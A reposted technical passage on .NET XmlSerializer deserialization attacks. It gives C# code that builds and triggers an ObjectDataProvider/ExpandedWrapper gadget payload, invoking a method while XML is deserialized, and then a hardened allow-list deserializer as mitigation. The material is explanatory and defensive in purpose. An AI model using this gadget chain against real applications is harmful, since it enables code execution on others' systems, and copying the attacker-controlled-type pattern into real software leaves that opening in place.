Preconditions:
- The type is attacker-controlled when the serializer is constructed: new XmlSerializer(type) with a controllable type
- The input is attacker-controlled when deserializing: serializer.Deserialize(fi) with a controllable fi
Two key classes (assembly, then fully qualified type name):
// PresentationFramework.dll v4.0.0.0
System.Windows.Data.ObjectDataProvider
// System.Data.Services.dll v4.0.0.0
System.Data.Services.Internal.ExpandedWrapper
Payload generation:

    using System.IO;
    using System.Xml.Serialization;
    using System.Windows.Data;             // ObjectDataProvider (PresentationFramework.dll)
    using System.Data.Services.Internal;   // ExpandedWrapper (System.Data.Services.dll)

    // Class2 is the author's own class exposing a writeFile(string, string) method; its source is not shown on this page.
    public static void serializeObjectWithXmlSer()
    {
        // ExpandedWrapper is a public generic type whose ProjectedProperty0 is serialized by XmlSerializer,
        // so it carries the ObjectDataProvider inside a type XmlSerializer is willing to construct.
        ExpandedWrapper<Class2, ObjectDataProvider> eobj = new ExpandedWrapper<Class2, ObjectDataProvider>();
        XmlSerializer serializer = new XmlSerializer(typeof(ExpandedWrapper<Class2, ObjectDataProvider>));
        // ObjectDataProvider invokes MethodName on ObjectInstance with MethodParameters once these properties are set.
        eobj.ProjectedProperty0 = new ObjectDataProvider();
        eobj.ProjectedProperty0.ObjectInstance = new Class2();
        eobj.ProjectedProperty0.MethodName = "writeFile";
        eobj.ProjectedProperty0.MethodParameters.Add("xxxxx");
        eobj.ProjectedProperty0.MethodParameters.Add("ser.txt");
        TextWriter fo = new StreamWriter("d:/tmp/xmlser.txt");
        serializer.Serialize(fo, eobj);
        fo.Close();
    }
Triggering the payload:

    using System.IO;
    using System.Xml.Serialization;
    using System.Windows.Data;
    using System.Data.Services.Internal;

    public static void deserializeObjectWithXmlSer()
    {
        // Both preconditions hold here: the serializer type and the input file are attacker-controlled.
        XmlSerializer ser = new XmlSerializer(typeof(ExpandedWrapper<Class2, ObjectDataProvider>));
        TextReader fi = new StreamReader("d:/tmp/xmlser.txt");
        ser.Deserialize(fi);   // writeFile("xxxxx", "ser.txt") is invoked while the XML is being deserialized
        fi.Close();
    }
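The mitigation follows directly from the preconditions: if the application never hands an attacker-chosen type to XmlSerializer, the wrapper type cannot be requested at all. The hypothetical SafeXmlDeserializer below is an added example (not code from the original post) that checks the requested type against an application allow-list before any input is read, rejects generic wrappers such as ExpandedWrapper<Class2, ObjectDataProvider> outright, and disables DTD processing on the reader; Class2 stands in for the application's own expected data type.

```csharp
using System;
using System.Collections.Generic;
using System.IO;
using System.Xml;
using System.Xml.Serialization;

// Hypothetical hardened wrapper around XmlSerializer (added example, not from the original post).
public static class SafeXmlDeserializer
{
    // Only the concrete data types this application actually exchanges over XML.
    // Class2 is a placeholder for your own DTO; never put framework gadget types here.
    private static readonly HashSet<Type> AllowedTypes = new HashSet<Type>
    {
        typeof(Class2)
    };

    public static object Deserialize(Type type, TextReader input)
    {
        if (type == null) throw new ArgumentNullException(nameof(type));
        if (input == null) throw new ArgumentNullException(nameof(input));

        // Closing the first precondition: the type must be on the allow-list, and generic
        // wrappers (ExpandedWrapper<...> and friends) are refused before the list is consulted.
        if (type.IsGenericType || !AllowedTypes.Contains(type))
            throw new InvalidOperationException(
                "Type " + type.FullName + " is not permitted for XML deserialization");

        var settings = new XmlReaderSettings
        {
            DtdProcessing = DtdProcessing.Prohibit, // no DTDs, so no entity expansion or XXE
            XmlResolver = null                      // never fetch external resources
        };

        using (var reader = XmlReader.Create(input, settings))
        {
            var serializer = new XmlSerializer(type);
            // The root element must match the allowed type; a mismatch is a clear failure
            // rather than a silent attempt to construct something else.
            if (!serializer.CanDeserialize(reader))
                throw new InvalidOperationException("XML root element does not match " + type.Name);
            return serializer.Deserialize(reader);
        }
    }
}
```

In the vulnerable trigger above, replacing the direct XmlSerializer call with SafeXmlDeserializer.Deserialize(typeof(Class2), fi) causes a request for the ExpandedWrapper type to be rejected before the file is opened for parsing.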
Reposted from: https://blog.51cto.com/duallay/2045651